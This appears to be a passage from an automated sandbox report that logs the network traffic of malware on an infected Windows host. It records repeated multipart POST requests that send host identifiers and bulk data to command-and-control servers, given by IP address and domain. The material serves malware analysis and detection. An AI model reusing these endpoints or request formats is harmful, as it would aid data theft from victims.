Dec 27, 2023 17:58:53.818114042 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:53.955117941 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAE Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:54.667836905 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:54.721947908 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFB Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:55.317517042 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:55.361727953 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDH Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:56.214701891 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:56.252149105 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCFHDHIIIECBGCAKFIJ Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:57.073367119 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:57.212501049 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJK Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:57.908643961 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:57.965177059 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJE Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:58.776753902 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:58.844466925 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:59.522202015 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:59.599198103 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAEC Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:59:00.376404047 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:59:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:59:00.485651970 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDA Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:59:01.667388916 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:59:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:59:01.711968899 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFB Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:59:02.452883005 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:59:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:59:02.497061014 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGD Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:59:03.265485048 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:59:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:59:03.302061081 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFB Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:59:04.284220934 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:59:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:59:04.394977093 CET	200	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF Host: 5.42.66.58 Content-Length: 151215 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:59:05.545679092 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:59:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:59:05.700340033 CET	461	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK Host: 5.42.66.58 Content-Length: 264 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 64 6f 6e 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="message"done------DAKFIDHDGIEGCAKFIIJK--
Dec 27, 2023 17:59:06.414233923 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:59:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49756	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:52.045502901 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:57:52.045676947 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:57:52.581727028 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=50kh76cardgvsmkma3e2jssm47; expires=Sun, 21-Apr-2024 10:44:31 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JGfDUMti8tMSex7E2ynBq353sYjtWW2%2Fb1ruKdd%2BNEJYzvdLvlHiRdprCyLvo67tCMqZNy43eFHKO9tnJCmo%2B1zvPFz7VudY7PrvflZ95Znmlyvu1E8SYQCAGZklG3coYyMZbX8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ae4ae7 Data Raw: Data Ascii:
Dec 27, 2023 17:57:52.581748962 CET	39	IN	Data Raw: 32 65 36 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 2e61-DFW15Malformed packet data
Dec 27, 2023 17:57:52.581759930 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49757	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:52.319979906 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:57:52.320166111 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:57:52.862799883 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=pfh3brd492r62poeqs9ege0nnc; expires=Sun, 21-Apr-2024 10:44:31 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EWDjp1PWXQOEYDtptiH8pmZYDI2IvdXoJxyS3HDf98tEG%2Bw4wK4FwAfkIoV%2BndV4PnGUnWEwZ9GxpKG%2BIJDNb0kn0DctsIATr5jm49nHyX36BLlLnZ9vN%2Fj7H4FOGVb8TWA3z74%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ae66 Data Raw: Data Ascii:
Dec 27, 2023 17:57:52.862818956 CET	41	IN	Data Raw: 39 37 36 62 62 36 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 976bb6-DFW15Malformed packet data
Dec 27, 2023 17:57:52.862832069 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49760	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:52.887273073 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:57:52.887552023 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:57:53.277831078 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=jrmlq0lf0ndr7ata3mfstcch6g; expires=Sun, 21-Apr-2024 10:44:32 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D30%2FU%2BWcz%2FxRSHv1CDctaf8bszfKUpCKN50e3XhQmVsihyWY7X1%2B4fTt%2BcoPkkRI6shHi%2FkF%2BNGOIPEvnwOqLdbdNQUOfOykWjbDuadD%2BESVEJxl5bwxxrBmF%2FkPzYyXmqtjFQ4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: Data Raw: Data Ascii:
Dec 27, 2023 17:57:53.277848959 CET	51	IN	Data Raw: 38 33 63 33 31 61 65 39 66 66 36 65 36 62 33 62 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 83c31ae9ff6e6b3b-DFW15Malformed packet data
Dec 27, 2023 17:57:53.277861118 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49761	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:53.020762920 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:57:53.020778894 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:57:53.563441038 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=ptjm8n78dcm2hl705kj4k6e68o; expires=Sun, 21-Apr-2024 10:44:32 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qSobiKSEbU1EktKgHRnNEKdI%2Ft2xYQRyex9kKjiE71%2B2WuiXHTYF%2Fbx9BbkhobYSchsSemvAys9zHWOMVIY%2BBD5oG7fvH%2BC1bQK8elKDY%2F%2FdB%2BgtzCnBzwpzOOOquNrIJvLX4Q0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8 Data Raw: Data Ascii:
Dec 27, 2023 17:57:53.563455105 CET	49	IN	Data Raw: 63 33 31 61 65 61 63 66 65 63 33 31 37 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: c31aeacfec3171-DFW15Malformed packet data
Dec 27, 2023 17:57:53.563467026 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49762	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:53.433124065 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:57:53.434076071 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:57:53.969573021 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=33av8frsg604lhjoaa2far7s9u; expires=Sun, 21-Apr-2024 10:44:32 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X9iMFyng0LKKKCXI%2B7PnnVSbltnNHxW3SAgQSV6b5n9uV66DcNv6pIW3qRv%2BxmichiGm8SAktE47GKuFxc6Pe7Q3nmotwwD4dJ9zejZR2KZF91PAAUGEQNzcGtM1A2af1c68II0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31aed5dc63 Data Raw: Data Ascii:
Dec 27, 2023 17:57:53.969590902 CET	37	IN	Data Raw: 35 65 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 5e-DFW15Malformed packet data
Dec 27, 2023 17:57:53.969604015 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49763	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:53.783776999 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:57:53.783865929 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:57:54.304949999 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=8maqn0dupi9de4iupve4pvunum; expires=Sun, 21-Apr-2024 10:44:33 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:54 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ahL1tnL2HLLljt7VHXHTvmkQYxZpoZhueoMx3ka%2Bkoo7AJfnKawQuF%2BDzpwhmPB75OQmcxf2M%2BrtyzoXHGw1GGQqGfMlCxPh%2BR%2FVYbA%2BT3uUMBr0mnSKA50%2FUB24qD%2FBnYhw4VM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8 